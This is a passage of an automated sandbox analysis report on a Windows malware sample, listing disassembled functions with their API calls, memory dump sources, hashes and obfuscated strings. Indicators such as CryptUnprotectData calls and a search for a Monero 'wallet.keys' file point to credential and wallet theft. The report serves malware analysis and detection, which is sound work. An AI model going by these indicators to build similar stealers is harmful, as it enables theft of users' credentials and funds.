                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Px{^$k:=$y?oY$>g6
                          • API String ID: 0-643451404
                          • Opcode ID: a154b458e494b7dfcc34da0ea74c6bbcee98489c9df9252be5816adfce91379e
                          • Instruction ID: 9afaae43dc458f508aaae2e060c0beb42d825f42e7a171d367b39ab610af20e4
                          • Opcode Fuzzy Hash: a154b458e494b7dfcc34da0ea74c6bbcee98489c9df9252be5816adfce91379e
                          • Instruction Fuzzy Hash: 69B2F6F360C204AFE3046E2DEC8567ABBE9EF94720F1A463DE6C4C3744EA7558058697
                          Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                          • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                          • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                          • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                          Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0128D8C8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00417A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0128D8C8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                          • wsprintfA.USER32 ref: 00417AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                          • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                          • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                          • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                          Function 007C8B69 Relevance: 5.4, Strings: 3, Instructions: 1677COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: N hv$`o$V?w
                          • API String ID: 0-2689779999
                          • Opcode ID: 3154c95c5908c351d139f1df77e55d449680bf68dd411a53c151649a934a1896
                          • Instruction ID: 7f29cfa3e5e9fbb528951ba447c00a495fc54016682efb7e55b99460e9bee0a5
                          • Opcode Fuzzy Hash: 3154c95c5908c351d139f1df77e55d449680bf68dd411a53c151649a934a1896
                          • Instruction Fuzzy Hash: 44B239F3A082009FE304AE2DEC4567AB7E6EFD4320F1A853DEAC5D3744EA7558058697
                          Function 007D14BA Relevance: 5.3, Strings: 3, Instructions: 1570COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: G_w$~[_$*w{
                          • API String ID: 0-3789188570
                          • Opcode ID: 0cd17085173ac4a23225c09256a0ccfce7232490426a46e747ed6aef208cadd7
                          • Instruction ID: 35af049e7bb702c9d153f93e007ceb1d863f3fa7531d4fd35dd8ce92e22a5971
                          • Opcode Fuzzy Hash: 0cd17085173ac4a23225c09256a0ccfce7232490426a46e747ed6aef208cadd7
                          • Instruction Fuzzy Hash: DFB2E5F3A0C2049FE7046E2DEC8567ABBE9EF94720F16493DEAC4C3344EA3558158697
                          Function 007DA1B9 Relevance: 4.6, Strings: 3, Instructions: 878COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "t|$vo_$}hg
                          • API String ID: 0-3737732124
                          • Opcode ID: 1ebd5e3b2bed53200b37be242472984eb49a307875c5309f47cc58272489f057
                          • Instruction ID: ffcbd222d459af1aa0e5e453792523ef8e7ca55105195078d0c66661ef9a8eb5
                          • Opcode Fuzzy Hash: 1ebd5e3b2bed53200b37be242472984eb49a307875c5309f47cc58272489f057
                          • Instruction Fuzzy Hash: 834207F3A0C2049FD3046E2DEC4567AFBEAEFD4720F1A463DE6C487744EA3598058696
                          Function 00413720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                          • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                          • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                          • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                          Function 00409B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                          • LocalFree.KERNEL32(?), ref: 00409BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 3b80322b02821ad40be44c2d779127a4b0da0f685be038a0a450de2c4c3011bb
                          • Instruction ID: a7dd7d88ef9fddb89c8ab42ef12d3e8ff20f9c8e15d72f7a6a9a533d2b4962a9
                          • Opcode Fuzzy Hash: 3b80322b02821ad40be44c2d779127a4b0da0f685be038a0a450de2c4c3011bb
                          • Instruction Fuzzy Hash: B211CCB9A00209EFDB04DF94D985AAE77B6FF89300F104569E915A7390D774AE10CF61
                          Function 0040F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                          • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                          • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                          • Instruction ID: df6638fc5bd81c094c6f77900714a3576ce2bb2c5a2211ca5e3b78e4b48bff29
                          • Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
                          • Instruction Fuzzy Hash: 2611E73080110CABDB24FBB0DC559ED7338AF10314F4042AFA00A570D2EF382B9ACB6A
                          Function 006F7027 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'C`D
                          • API String ID: 0-2050069804
                          • Opcode ID: 01d990a738332316d4947981cba7c60751fd0303b4756bb58cb04cdff24d03cd
                          • Instruction ID: d3c79d26217c8b596662296b85f67b2b4ff9ac69c18b13c76f9ace42127ea19d
                          • Opcode Fuzzy Hash: 01d990a738332316d4947981cba7c60751fd0303b4756bb58cb04cdff24d03cd
                          • Instruction Fuzzy Hash: 956103F2A082149FE310AE28DC8177AB7E5EF84720F06853DEAC487384EA395815C7C7
                          Function 007B3889 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: y~X
                          • API String ID: 0-2759057175
                          • Opcode ID: 981c3b692b31347dfdebde2d5985d56913e070c5333704824325c8cba6ac78e4
                          • Instruction ID: ffcf98a24656c716838450b23467f30817a86d16ce256d0035eafe2c0f53eedf
                          • Opcode Fuzzy Hash: 981c3b692b31347dfdebde2d5985d56913e070c5333704824325c8cba6ac78e4
                          • Instruction Fuzzy Hash: F95158F3E442144BF304692DEC84776B6D6EB94320F29853DDB94877C4E93E98058382
                          Function 00765D1E Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
